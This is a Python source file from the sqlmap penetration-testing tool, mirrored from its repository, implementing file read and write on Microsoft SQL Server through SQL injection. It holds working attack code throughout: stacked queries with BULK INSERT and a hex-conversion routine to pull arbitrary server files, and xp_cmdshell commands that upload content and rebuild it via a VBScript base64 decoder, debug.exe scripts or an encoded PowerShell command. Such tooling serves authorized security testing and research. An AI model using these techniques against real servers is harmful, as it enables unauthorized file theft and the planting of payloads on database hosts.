mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-02-16 12:20:35 +03:00
348 lines
14 KiB
Python
348 lines
14 KiB
Python
#!/usr/bin/env python
|
|
|
|
"""
|
|
Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
|
|
See the file 'doc/COPYING' for copying permission
|
|
"""
|
|
|
|
import codecs
|
|
import ntpath
|
|
import os
|
|
|
|
from lib.core.common import getLimitRange, isNumPosStrValue, isTechniqueAvailable, posixToNtSlashes, \
|
|
randomStr, readInput
|
|
from lib.core.convert import hexencode
|
|
from lib.core.data import conf, logger
|
|
from lib.core.enums import CHARSET_TYPE, EXPECTED, PAYLOAD
|
|
from lib.core.exception import sqlmapNoneDataException, sqlmapUnsupportedFeatureException
|
|
from lib.request import inject
|
|
|
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
|
|
|
class Filesystem(GenericFilesystem):
|
|
def __init__(self):
|
|
GenericFilesystem.__init__(self)
|
|
|
|
def __dataToScr(self, fileContent, chunkName):
|
|
fileLines = []
|
|
fileSize = len(fileContent)
|
|
lineAddr = 0x100
|
|
lineLen = 20
|
|
|
|
fileLines.append("n %s" % chunkName)
|
|
fileLines.append("rcx")
|
|
fileLines.append("%x" % fileSize)
|
|
fileLines.append("f 0100 %x 00" % fileSize)
|
|
|
|
for fileLine in xrange(0, len(fileContent), lineLen):
|
|
scrString = ""
|
|
|
|
for lineChar in fileContent[fileLine:fileLine+lineLen]:
|
|
strLineChar = hexencode(lineChar)
|
|
|
|
if not scrString:
|
|
scrString = "e %x %s" % (lineAddr, strLineChar)
|
|
else:
|
|
scrString += " %s" % strLineChar
|
|
|
|
lineAddr += len(lineChar)
|
|
|
|
fileLines.append(scrString)
|
|
|
|
fileLines.append("w")
|
|
fileLines.append("q")
|
|
|
|
return fileLines
|
|
|
|
def __updateDestChunk(self, fileContent, tmpPath):
|
|
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
|
|
chunkName = randomStr(lowercase=True)
|
|
fileScrLines = self.__dataToScr(fileContent, chunkName)
|
|
|
|
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
|
|
|
|
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
|
|
|
|
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
|
|
|
|
commands = ( "cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr )
|
|
complComm = " & ".join(command for command in commands)
|
|
|
|
self.execCmd(complComm)
|
|
|
|
return chunkName
|
|
|
|
def stackedReadFile(self, rFile):
|
|
infoMsg = "fetching file: '%s'" % rFile
|
|
logger.info(infoMsg)
|
|
|
|
result = []
|
|
txtTbl = self.fileTblName
|
|
hexTbl = "%shex" % self.fileTblName
|
|
|
|
self.createSupportTbl(txtTbl, self.tblField, "text")
|
|
inject.goStacked("DROP TABLE %s" % hexTbl)
|
|
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
|
|
|
|
logger.debug("loading the content of file '%s' into support table" % rFile)
|
|
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
|
|
|
|
# Reference: http://support.microsoft.com/kb/104829
|
|
binToHexQuery = """DECLARE @charset VARCHAR(16)
|
|
DECLARE @counter INT
|
|
DECLARE @hexstr VARCHAR(4096)
|
|
DECLARE @length INT
|
|
DECLARE @chunk INT
|
|
|
|
SET @charset = '0123456789ABCDEF'
|
|
SET @counter = 1
|
|
SET @hexstr = ''
|
|
SET @length = (SELECT DATALENGTH(%s) FROM %s)
|
|
SET @chunk = 1024
|
|
|
|
WHILE (@counter <= @length)
|
|
BEGIN
|
|
DECLARE @tempint INT
|
|
DECLARE @firstint INT
|
|
DECLARE @secondint INT
|
|
|
|
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
|
|
SET @firstint = floor(@tempint/16)
|
|
SET @secondint = @tempint - (@firstint * 16)
|
|
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
|
|
|
|
SET @counter = @counter + 1
|
|
|
|
IF @counter %% @chunk = 0
|
|
BEGIN
|
|
INSERT INTO %s(%s) VALUES(@hexstr)
|
|
SET @hexstr = ''
|
|
END
|
|
END
|
|
|
|
IF @counter %% (@chunk) != 0
|
|
BEGIN
|
|
INSERT INTO %s(%s) VALUES(@hexstr)
|
|
END
|
|
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
|
|
|
|
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
|
|
inject.goStacked(binToHexQuery)
|
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
|
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
|
|
|
|
if not result:
|
|
result = []
|
|
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
|
|
|
if not isNumPosStrValue(count):
|
|
errMsg = "unable to retrieve the content of the "
|
|
errMsg += "file '%s'" % rFile
|
|
raise sqlmapNoneDataException(errMsg)
|
|
|
|
indexRange = getLimitRange(count)
|
|
|
|
for index in indexRange:
|
|
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
|
|
result.append(chunk)
|
|
|
|
inject.goStacked("DROP TABLE %s" % hexTbl)
|
|
|
|
return result
|
|
|
|
def unionWriteFile(self, wFile, dFile, fileType):
|
|
errMsg = "Microsoft SQL Server does not support file upload with "
|
|
errMsg += "UNION query SQL injection technique"
|
|
raise sqlmapUnsupportedFeatureException(errMsg)
|
|
|
|
def __stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
|
|
infoMsg = "using PowerShell to write the %s file content " % fileType
|
|
infoMsg += "to file '%s', please wait.." % dFile
|
|
logger.info(infoMsg)
|
|
|
|
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
|
|
randFilePath = "%s\%s" % (tmpPath, randFile)
|
|
encodedFileContent = hexencode(wFileContent)
|
|
|
|
# TODO: need to be fixed
|
|
psString = "$s = gc '%s';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %%{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('%s',$b)" % (randFilePath, dFile)
|
|
psString = psString.encode('utf-16le')
|
|
psString = psString.encode("base64")[:-1].replace("\n", "")
|
|
|
|
logger.debug("uploading the file hex-encoded content to %s, please wait.." % randFilePath)
|
|
|
|
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
|
|
|
|
logger.debug("converting the file utilizing PowerShell EncodedCommand")
|
|
|
|
commands = ( "cd %s" % tmpPath,
|
|
"powershell -EncodedCommand %s" % psString,
|
|
"del /F /Q %s" % randFilePath )
|
|
complComm = " & ".join(command for command in commands)
|
|
|
|
self.execCmd(complComm)
|
|
|
|
def __stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
|
|
infoMsg = "using debug.exe to write the %s " % fileType
|
|
infoMsg += "file content to file '%s', please wait.." % dFile
|
|
logger.info(infoMsg)
|
|
|
|
dFileName = ntpath.basename(dFile)
|
|
sFile = "%s\%s" % (tmpPath, dFileName)
|
|
wFileSize = os.path.getsize(wFile)
|
|
debugSize = 0xFF00
|
|
|
|
if wFileSize < debugSize:
|
|
chunkName = self.__updateDestChunk(wFileContent, tmpPath)
|
|
|
|
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
|
|
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
|
|
logger.debug(debugMsg)
|
|
|
|
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
|
|
complComm = " & ".join(command for command in commands)
|
|
|
|
self.execCmd(complComm)
|
|
|
|
else:
|
|
debugMsg = "the file is larger than %d bytes. " % debugSize
|
|
debugMsg += "sqlmap will split it into chunks locally, upload "
|
|
debugMsg += "it chunk by chunk and recreate the original file "
|
|
debugMsg += "on the server, please wait.."
|
|
logger.debug(debugMsg)
|
|
|
|
for i in xrange(0, wFileSize, debugSize):
|
|
wFileChunk = wFileContent[i:i + debugSize]
|
|
chunkName = self.__updateDestChunk(wFileChunk, tmpPath)
|
|
|
|
if i == 0:
|
|
debugMsg = "renaming chunk "
|
|
copyCmd = "ren %s %s" % (chunkName, dFileName)
|
|
else:
|
|
debugMsg = "appending chunk "
|
|
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
|
|
|
|
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
|
|
logger.debug(debugMsg)
|
|
|
|
commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName)
|
|
complComm = " & ".join(command for command in commands)
|
|
|
|
self.execCmd(complComm)
|
|
|
|
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
|
|
|
|
commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
|
|
complComm = " & ".join(command for command in commands)
|
|
|
|
self.execCmd(complComm)
|
|
|
|
def __stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
|
|
infoMsg = "using a custom visual basic script to write the "
|
|
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
|
|
logger.info(infoMsg)
|
|
|
|
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
|
|
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
|
|
randFilePath = "%s\%s" % (tmpPath, randFile)
|
|
|
|
vbs = """Dim inputFilePath, outputFilePath
|
|
inputFilePath = "%s"
|
|
outputFilePath = "%s"
|
|
Set fs = CreateObject("Scripting.FileSystemObject")
|
|
Set file = fs.GetFile(inputFilePath)
|
|
If file.Size Then
|
|
Wscript.Echo "Loading from: " & inputFilePath
|
|
Wscript.Echo
|
|
Set fd = fs.OpenTextFile(inputFilePath, 1)
|
|
data = fd.ReadAll
|
|
fd.Close
|
|
data = Replace(data, " ", "")
|
|
data = Replace(data, vbCr, "")
|
|
data = Replace(data, vbLf, "")
|
|
Wscript.Echo "Fixed Input: "
|
|
Wscript.Echo data
|
|
Wscript.Echo
|
|
decodedData = base64_decode(data)
|
|
Wscript.Echo "Output: "
|
|
Wscript.Echo decodedData
|
|
Wscript.Echo
|
|
Wscript.Echo "Writing output in: " & outputFilePath
|
|
Wscript.Echo
|
|
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
|
|
ofs.Write decodedData
|
|
ofs.close
|
|
Else
|
|
Wscript.Echo "The file is empty."
|
|
End If
|
|
Function base64_decode(byVal strIn)
|
|
Dim w1, w2, w3, w4, n, strOut
|
|
For n = 1 To Len(strIn) Step 4
|
|
w1 = mimedecode(Mid(strIn, n, 1))
|
|
w2 = mimedecode(Mid(strIn, n + 1, 1))
|
|
w3 = mimedecode(Mid(strIn, n + 2, 1))
|
|
w4 = mimedecode(Mid(strIn, n + 3, 1))
|
|
If Not w2 Then _
|
|
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
|
|
If Not w3 Then _
|
|
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
|
|
If Not w4 Then _
|
|
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
|
|
Next
|
|
base64_decode = strOut
|
|
End Function
|
|
Function mimedecode(byVal strIn)
|
|
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
|
|
If Len(strIn) = 0 Then
|
|
mimedecode = -1 : Exit Function
|
|
Else
|
|
mimedecode = InStr(Base64Chars, strIn) - 1
|
|
End If
|
|
End Function""" % (randFilePath, dFile)
|
|
|
|
vbs = vbs.replace(" ", "")
|
|
encodedFileContent = wFileContent.encode("base64")[:-1]
|
|
|
|
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
|
|
|
|
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
|
|
|
|
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
|
|
|
|
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
|
|
|
|
commands = ( "cd %s" % tmpPath, "cscript //nologo %s" % randVbs,
|
|
"del /F /Q %s" % randVbs,
|
|
"del /F /Q %s" % randFile )
|
|
complComm = " & ".join(command for command in commands)
|
|
|
|
self.execCmd(complComm)
|
|
|
|
def stackedWriteFile(self, wFile, dFile, fileType):
|
|
# NOTE: this is needed here because we use xp_cmdshell extended
|
|
# procedure to write a file on the back-end Microsoft SQL Server
|
|
# file system
|
|
self.initEnv()
|
|
|
|
self.getRemoteTempPath()
|
|
|
|
tmpPath = posixToNtSlashes(conf.tmpPath)
|
|
dFile = posixToNtSlashes(dFile)
|
|
wFilePointer = codecs.open(wFile, "rb")
|
|
wFileContent = wFilePointer.read()
|
|
wFilePointer.close()
|
|
|
|
self.__stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
|
|
|
|
sameFile = self.askCheckWrittenFile(wFile, dFile, fileType)
|
|
|
|
if sameFile is False:
|
|
message = "do you want to try to upload the file with "
|
|
message += "another technique? [Y/n] "
|
|
choice = readInput(message, default="Y")
|
|
|
|
if not choice or choice.lower() == "y":
|
|
self.__stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
|
#self.__stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
|